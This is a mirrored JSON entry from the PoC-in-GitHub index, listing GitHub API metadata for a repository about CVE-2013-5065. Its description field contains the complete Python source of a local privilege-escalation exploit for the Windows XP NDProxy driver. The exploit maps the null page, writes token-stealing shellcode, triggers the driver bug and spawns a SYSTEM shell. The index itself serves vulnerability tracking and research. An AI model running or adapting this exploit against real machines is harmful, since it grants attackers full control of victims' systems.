mirror/PoC-in-GitHub
1
0
Fork 0
mirror of https://github.com/nomi-sec/PoC-in-GitHub.git synced 2025-01-28 18:44:10 +01:00
Code Issues Projects Releases Packages Wiki Activity Actions
PoC-in-GitHub/2013/CVE-2013-5065.json
motikan2010-bot c2265cf55a Auto Update 2019/12/08 22:14:23
2019-12-08 22:19:20 +09:00

97 lines
No EOL
9.2 KiB
JSON
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

[
{
"id": 15000564,
"node_id": "MDEwOlJlcG9zaXRvcnkxNTAwMDU2NA==",
"name": "RobbinHood",
"full_name": "Friarfukd\/RobbinHood",
"private": false,
"owner": {
"login": "Friarfukd",
"id": 6127925,
"node_id": "MDQ6VXNlcjYxMjc5MjU=",
"avatar_url": "https:\/\/avatars1.githubusercontent.com\/u\/6127925?v=4",
"gravatar_id": "",
"url": "https:\/\/api.github.com\/users\/Friarfukd",
"html_url": "https:\/\/github.com\/Friarfukd",
"followers_url": "https:\/\/api.github.com\/users\/Friarfukd\/followers",
"following_url": "https:\/\/api.github.com\/users\/Friarfukd\/following{\/other_user}",
"gists_url": "https:\/\/api.github.com\/users\/Friarfukd\/gists{\/gist_id}",
"starred_url": "https:\/\/api.github.com\/users\/Friarfukd\/starred{\/owner}{\/repo}",
"subscriptions_url": "https:\/\/api.github.com\/users\/Friarfukd\/subscriptions",
"organizations_url": "https:\/\/api.github.com\/users\/Friarfukd\/orgs",
"repos_url": "https:\/\/api.github.com\/users\/Friarfukd\/repos",
"events_url": "https:\/\/api.github.com\/users\/Friarfukd\/events{\/privacy}",
"received_events_url": "https:\/\/api.github.com\/users\/Friarfukd\/received_events",
"type": "User",
"site_admin": false
},
"html_url": "https:\/\/github.com\/Friarfukd\/RobbinHood",
"description": "# NDPROXY Local SYSTEM privilege escalation # http:\/\/www.offensive-security.com # Tested on Windows XP SP3 # http:\/\/www.offensive-security.com\/vulndev\/ndproxy-local-system-exploit-cve-2013-5065\/     # Original crash ... null pointer dereference # Access violation - code c0000005 (!!! second chance !!!) # 00000038 ??              ???   from ctypes import * from ctypes.wintypes import * import os, sys   kernel32 = windll.kernel32 ntdll = windll.ntdll   GENERIC_READ     = 0x80000000 GENERIC_WRITE    = 0x40000000 FILE_SHARE_READ  = 0x00000001 FILE_SHARE_WRITE = 0x00000002 NULL = 0x0 OPEN_EXISTING = 0x3 PROCESS_VM_WRITE            = 0x0020 PROCESS_VM_READ             = 0x0010 MEM_COMMIT                  = 0x00001000 MEM_RESERVE                 = 0x00002000 MEM_FREE                    = 0x00010000 PAGE_EXECUTE_READWRITE      = 0x00000040 PROCESS_ALL_ACCESS          = 2097151 FORMAT_MESSAGE_FROM_SYSTEM  = 0x00001000 baseadd = c_int(0x00000001) MEMRES = (0x1000 | 0x2000) MEM_DECOMMIT = 0x4000 PAGEEXE = 0x00000040 null_size = c_int(0x1000) STATUS_SUCCESS = 0   def log(msg):     print msg   def getLastError():     \"\"\"[-] Format GetLastError\"\"\"     buf = create_string_buffer(2048)     if kernel32.FormatMessageA(FORMAT_MESSAGE_FROM_SYSTEM, NULL,             kernel32.GetLastError(), 0,             buf, sizeof(buf), NULL):         log(buf.value)     else:         log(\"[-] Unknown Error\")   print \"[*] Microsoft Windows NDProxy CVE-2013-5065 0day\" print \"[*] Vulnerability found in the wild\" print \"[*] Coded by Offensive Security\"                 tmp = (\"\\x00\"*4)*5 + \"\\x25\\x01\\x03\\x07\" + \"\\x00\"*4 + \"\\x34\\x00\\x00\\x00\" + \"\\x00\"*(84-24) InBuf = c_char_p(tmp)   dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, byref(baseadd), 0x0, byref(null_size), MEMRES, PAGEEXE) if dwStatus != STATUS_SUCCESS:     print \"[+] Something went wrong while allocating the null paged memory: %s\" % dwStatus     getLastError() written = c_ulong() sh = \"\\x90\\x33\\xC0\\x64\\x8B\\x80\\x24\\x01\\x00\\x00\\x8B\\x40\\x44\\x8B\\xC8\\x8B\\x80\\x88\\x00\\x00\\x00\\x2D\\x88\\x00\\x00\\x00\\x83\\xB8\\x84\\x00\\x00\\x00\\x04\\x75\\xEC\\x8B\\x90\\xC8\\x00\\x00\\x00\\x89\\x91\\xC8\\x00\\x00\\x00\\xC3\" sc = \"\\x90\"*0x38 + \"\\x3c\\x00\\x00\\x00\" + \"\\x90\"*4 + sh + \"\\xcc\"*(0x400-0x3c-4-len(sh)) alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, 0x00000001, sc, 0x400, byref(written)) if alloc == 0:     print \"[+] Something went wrong while writing our junk to the null paged memory: %s\" % alloc     getLastError()   dwRetBytes = DWORD(0) DEVICE_NAME   = \"\\\\\\\\.\\\\NDProxy\" hdev = kernel32.CreateFileA(DEVICE_NAME, 0, 0, None, OPEN_EXISTING , 0, None) if hdev == -1:     print \"[-] Couldn't open the device... :(\"     sys.exit() kernel32.DeviceIoControl(hdev, 0x8fff23cc, InBuf, 0x54, InBuf, 0x24, byref(dwRetBytes), 0) kernel32.CloseHandle(hdev) print \"[+] Spawning SYSTEM Shell...\" os.system(\"start \/d \\\"C:\\\\windows\\\\system32\\\" cmd.exe\")",
"fork": false,
"url": "https:\/\/api.github.com\/repos\/Friarfukd\/RobbinHood",
"forks_url": "https:\/\/api.github.com\/repos\/Friarfukd\/RobbinHood\/forks",
"keys_url": "https:\/\/api.github.com\/repos\/Friarfukd\/RobbinHood\/keys{\/key_id}",
"collaborators_url": "https:\/\/api.github.com\/repos\/Friarfukd\/RobbinHood\/collaborators{\/collaborator}",
"teams_url": "https:\/\/api.github.com\/repos\/Friarfukd\/RobbinHood\/teams",
"hooks_url": "https:\/\/api.github.com\/repos\/Friarfukd\/RobbinHood\/hooks",
"issue_events_url": "https:\/\/api.github.com\/repos\/Friarfukd\/RobbinHood\/issues\/events{\/number}",
"events_url": "https:\/\/api.github.com\/repos\/Friarfukd\/RobbinHood\/events",
"assignees_url": "https:\/\/api.github.com\/repos\/Friarfukd\/RobbinHood\/assignees{\/user}",
"branches_url": "https:\/\/api.github.com\/repos\/Friarfukd\/RobbinHood\/branches{\/branch}",
"tags_url": "https:\/\/api.github.com\/repos\/Friarfukd\/RobbinHood\/tags",
"blobs_url": "https:\/\/api.github.com\/repos\/Friarfukd\/RobbinHood\/git\/blobs{\/sha}",
"git_tags_url": "https:\/\/api.github.com\/repos\/Friarfukd\/RobbinHood\/git\/tags{\/sha}",
"git_refs_url": "https:\/\/api.github.com\/repos\/Friarfukd\/RobbinHood\/git\/refs{\/sha}",
"trees_url": "https:\/\/api.github.com\/repos\/Friarfukd\/RobbinHood\/git\/trees{\/sha}",
"statuses_url": "https:\/\/api.github.com\/repos\/Friarfukd\/RobbinHood\/statuses\/{sha}",
"languages_url": "https:\/\/api.github.com\/repos\/Friarfukd\/RobbinHood\/languages",
"stargazers_url": "https:\/\/api.github.com\/repos\/Friarfukd\/RobbinHood\/stargazers",
"contributors_url": "https:\/\/api.github.com\/repos\/Friarfukd\/RobbinHood\/contributors",
"subscribers_url": "https:\/\/api.github.com\/repos\/Friarfukd\/RobbinHood\/subscribers",
"subscription_url": "https:\/\/api.github.com\/repos\/Friarfukd\/RobbinHood\/subscription",
"commits_url": "https:\/\/api.github.com\/repos\/Friarfukd\/RobbinHood\/commits{\/sha}",
"git_commits_url": "https:\/\/api.github.com\/repos\/Friarfukd\/RobbinHood\/git\/commits{\/sha}",
"comments_url": "https:\/\/api.github.com\/repos\/Friarfukd\/RobbinHood\/comments{\/number}",
"issue_comment_url": "https:\/\/api.github.com\/repos\/Friarfukd\/RobbinHood\/issues\/comments{\/number}",
"contents_url": "https:\/\/api.github.com\/repos\/Friarfukd\/RobbinHood\/contents\/{+path}",
"compare_url": "https:\/\/api.github.com\/repos\/Friarfukd\/RobbinHood\/compare\/{base}...{head}",
"merges_url": "https:\/\/api.github.com\/repos\/Friarfukd\/RobbinHood\/merges",
"archive_url": "https:\/\/api.github.com\/repos\/Friarfukd\/RobbinHood\/{archive_format}{\/ref}",
"downloads_url": "https:\/\/api.github.com\/repos\/Friarfukd\/RobbinHood\/downloads",
"issues_url": "https:\/\/api.github.com\/repos\/Friarfukd\/RobbinHood\/issues{\/number}",
"pulls_url": "https:\/\/api.github.com\/repos\/Friarfukd\/RobbinHood\/pulls{\/number}",
"milestones_url": "https:\/\/api.github.com\/repos\/Friarfukd\/RobbinHood\/milestones{\/number}",
"notifications_url": "https:\/\/api.github.com\/repos\/Friarfukd\/RobbinHood\/notifications{?since,all,participating}",
"labels_url": "https:\/\/api.github.com\/repos\/Friarfukd\/RobbinHood\/labels{\/name}",
"releases_url": "https:\/\/api.github.com\/repos\/Friarfukd\/RobbinHood\/releases{\/id}",
"deployments_url": "https:\/\/api.github.com\/repos\/Friarfukd\/RobbinHood\/deployments",
"created_at": "2013-12-07T05:37:28Z",
"updated_at": "2016-09-04T16:47:18Z",
"pushed_at": "2013-12-07T05:37:28Z",
"git_url": "git:\/\/github.com\/Friarfukd\/RobbinHood.git",
"ssh_url": "git@github.com:Friarfukd\/RobbinHood.git",
"clone_url": "https:\/\/github.com\/Friarfukd\/RobbinHood.git",
"svn_url": "https:\/\/github.com\/Friarfukd\/RobbinHood",
"homepage": "",
"size": 104,
"stargazers_count": 0,
"watchers_count": 0,
"language": null,
"has_issues": true,
"has_projects": true,
"has_downloads": true,
"has_wiki": true,
"has_pages": false,
"forks_count": 1,
"mirror_url": null,
"archived": false,
"disabled": false,
"open_issues_count": 0,
"license": null,
"forks": 1,
"open_issues": 0,
"watchers": 0,
"default_branch": "master",
"score": 1.6958954
}
]
Reference in a new issue View git blame Copy permalink